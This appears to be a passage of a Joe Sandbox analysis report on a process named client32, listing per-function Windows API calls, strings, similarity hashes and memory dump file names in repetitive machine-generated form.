                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3550192930-0
                                                                                                                                                                                • Opcode ID: 6f097cf58c4cf10d9534a66f4dec69a124543a17e082b1d55f6e0ffd6d545819
                                                                                                                                                                                • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                                                                                                                                • Opcode Fuzzy Hash: 6f097cf58c4cf10d9534a66f4dec69a124543a17e082b1d55f6e0ffd6d545819
                                                                                                                                                                                • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                                                                                                                                Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,11110200,75BF8400,?), ref: 11143E97
                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile$CloseHandle
                                                                                                                                                                                • String ID: "
                                                                                                                                                                                • API String ID: 1443461169-123907689
                                                                                                                                                                                • Opcode ID: 0e31440ef23e9adefb804b96e8dd1e5086d344fe2ef6ea17fd42eb01d8fdae18
                                                                                                                                                                                • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                                                                                                                                • Opcode Fuzzy Hash: 0e31440ef23e9adefb804b96e8dd1e5086d344fe2ef6ea17fd42eb01d8fdae18
                                                                                                                                                                                • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                                                                                                                                Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,2520CF5D,?,?,?,Function_001821CB,000000FF), ref: 1102D8E7
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,000000FF,?,11027947), ref: 1111029E
                                                                                                                                                                                • CreateEventA.KERNEL32 ref: 1102D8AA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Event$Create$__wcstoi64wsprintf
                                                                                                                                                                                • String ID: Client$DisableGeolocation
                                                                                                                                                                                • API String ID: 3570057919-4166767992
                                                                                                                                                                                • Opcode ID: c07e6b4a435e2b25e3037a2cf7947c11b412b19eb2e9e7cb084e5fdc7d1b3d30
                                                                                                                                                                                • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                                                                                                                                • Opcode Fuzzy Hash: c07e6b4a435e2b25e3037a2cf7947c11b412b19eb2e9e7cb084e5fdc7d1b3d30
                                                                                                                                                                                • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                                                                                                                                Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                                                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75BF35B0,00000000,75BF3760,00000000,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD95B
                                                                                                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                                                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                                                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 110CD9A4
                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 11027850
                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 11027856
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                                                                                                                • API String ID: 3212272093-2210386016
                                                                                                                                                                                • Opcode ID: 30b49b64186583e22a2cc6b4f11745f78d570d7011ef41735d717fa415472f88
                                                                                                                                                                                • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                                                                                                                                • Opcode Fuzzy Hash: 30b49b64186583e22a2cc6b4f11745f78d570d7011ef41735d717fa415472f88
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                                                                                                                                Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110179ED
                                                                                                                                                                                  • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101792C
                                                                                                                                                                                  • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                                                                                                  • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                                                                                                  • Part of subcall function 110178F0: CoUninitialize.COMBASE ref: 110179C0
                                                                                                                                                                                  • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017842
                                                                                                                                                                                  • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                                                                                                  • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                                                                                                  • Part of subcall function 11017810: CoUninitialize.COMBASE ref: 110178D0
                                                                                                                                                                                • SetEvent.KERNEL32(0000031C), ref: 11017A0D
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11017A13
                                                                                                                                                                                Strings
                                                                                                                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                                                                • API String ID: 3804766296-4122679463
                                                                                                                                                                                • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                                                                                • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                                                                                                                                • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                                                                                                                                • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                                                                                                                                Function 6C605000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C605014
                                                                                                                                                                                • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C608E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C605034
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,6C608E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C60503D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                                                                                • String ID: GetModuleFileNameExA
                                                                                                                                                                                • API String ID: 4084229558-758377266
                                                                                                                                                                                • Opcode ID: 1caad33009ff9f9465d47d2c326a13a72d36e276b688c72b3686042116c9e14f
                                                                                                                                                                                • Instruction ID: b333c642005d1ef0f48ade28f4877a4b3990a6fdb7c2f98f25c7ec763f4d44bf
                                                                                                                                                                                • Opcode Fuzzy Hash: 1caad33009ff9f9465d47d2c326a13a72d36e276b688c72b3686042116c9e14f
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F05E72604228ABC724DF94E844E5B77B8EB48B55F00891AF94697640C671E8148BA9
                                                                                                                                                                                Function 6C604FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C604FC4
                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C608E0D,00000000,?,6C608E0D,00000000,?,00000FA0,?), ref: 6C604FE4
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,6C608E0D,00000000,?,00000FA0,?), ref: 6C604FED
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                                                                                • String ID: EnumProcessModules
                                                                                                                                                                                • API String ID: 3858832252-3735562946
                                                                                                                                                                                • Opcode ID: 7757a22390619eaa0c13f656fdc0a797000dea81bf518ce8837ffd7979393b0b
                                                                                                                                                                                • Instruction ID: 5ee97d7404cba4722c831458fece055db066bcdea3abf417be3165735cb27d8a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7757a22390619eaa0c13f656fdc0a797000dea81bf518ce8837ffd7979393b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: 57F08272600228AFC724DF95D844E6B77A8EB58725F00C91AF959D7640C670E810CFA4
                                                                                                                                                                                Function 11138740 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00138580,00000000,00000000,111396D2), ref: 1113877E
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,111396D2,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11138785
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                                                                                • String ID: *AutoICFConfig$Client
                                                                                                                                                                                • API String ID: 3257255551-59951473
                                                                                                                                                                                • Opcode ID: e7f4410a8569d13ac94015adfc00944d022c2b6f22166e7f12f36fd63ceb9031
                                                                                                                                                                                • Instruction ID: 465e4da249eed1782d5a870e25bf0fc53578c4739eb9f60baa785aa5b16743b3
                                                                                                                                                                                • Opcode Fuzzy Hash: e7f4410a8569d13ac94015adfc00944d022c2b6f22166e7f12f36fd63ceb9031
                                                                                                                                                                                • Instruction Fuzzy Hash: 93E0D8397A0319BBF2108BE28D4BFA0FB5D9700766F100324FB34650C8E6A0B4408755
                                                                                                                                                                                Function 11070F90 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 11070FE7
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070FF4
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 110710C6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                                                • String ID: Push
                                                                                                                                                                                • API String ID: 1566154052-4278761818
                                                                                                                                                                                • Opcode ID: b473e9f487478d67ab6ce65255dfda61d86a337c57b1681a67a90444716b6f84
                                                                                                                                                                                • Instruction ID: 0680e92de3a1cb6b94a8841711a201229b8bffd134bed54c98ff914dc8d571b6
                                                                                                                                                                                • Opcode Fuzzy Hash: b473e9f487478d67ab6ce65255dfda61d86a337c57b1681a67a90444716b6f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                                                                                                                Function 6C60A4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(6C64B898,00000000,?,?,?,6C60DA7F,?,00000000), ref: 6C60A503
                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 6C60A568
                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,6C60DA7F,?,00000000), ref: 6C60A581
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(6C64B898,00000000), ref: 6C60A5B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4212191310-0
                                                                                                                                                                                • Opcode ID: 58c2bc4ff6ad0350a9d37538d78d41c3b124ec952b40d6262f400467838657de
                                                                                                                                                                                • Instruction ID: 4204465874762473ca0befa77dbddda1ed5ed63a0c3b10f3e4794662aade9faf
                                                                                                                                                                                • Opcode Fuzzy Hash: 58c2bc4ff6ad0350a9d37538d78d41c3b124ec952b40d6262f400467838657de
                                                                                                                                                                                • Instruction Fuzzy Hash: 61214CB2B00510AFDB16AF1AC98068AB3B9FFD335CF11C416D856A3A01D330A844CF9D
                                                                                                                                                                                Function 00C31020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCommandLineA.KERNEL32 ref: 00C31027
                                                                                                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 00C3107B
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00C31096
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00C310A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3004840074.0000000000C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3004820083.0000000000C30000.00000002.00000001.01000000.00000008.sdmpDownload File
